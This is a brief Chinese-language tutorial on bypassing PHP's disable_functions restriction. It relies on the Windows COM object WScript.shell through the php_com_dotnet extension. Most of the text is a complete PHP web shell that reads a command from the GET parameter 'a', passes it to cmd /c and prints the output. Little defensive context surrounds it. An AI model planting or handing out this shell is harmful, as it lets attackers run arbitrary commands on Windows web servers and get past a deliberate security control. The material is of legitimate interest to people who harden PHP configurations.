本文章主要讲述在php执行disable_function的函数绕过方式总结

Feature

调用COM对象执行命令

前提条件

调用COM对象需要开启扩展

extension=php_com_dotnet.dll 需要开启此扩展

绕过disable_function禁用的函数

disable_function禁用了exec、eval、shell这三个函数

若需要执行系统命令，调用exec函数肯定执行不了

可以发现执行系统命令是执行不了的

调用COM对象执行命令

<?php 

$cmd = $_GET['a'];

$wsh = new COM('WScript.shell'); // 生成一个COM对象

$exec = $wsh->exec("cmd /c ".$cmd);

$stdout = $exec->StdOut();

$stroutput = $stdout->ReadAll();

echo $stroutput;

 ?>

通过调用COM对象即可执行系统命令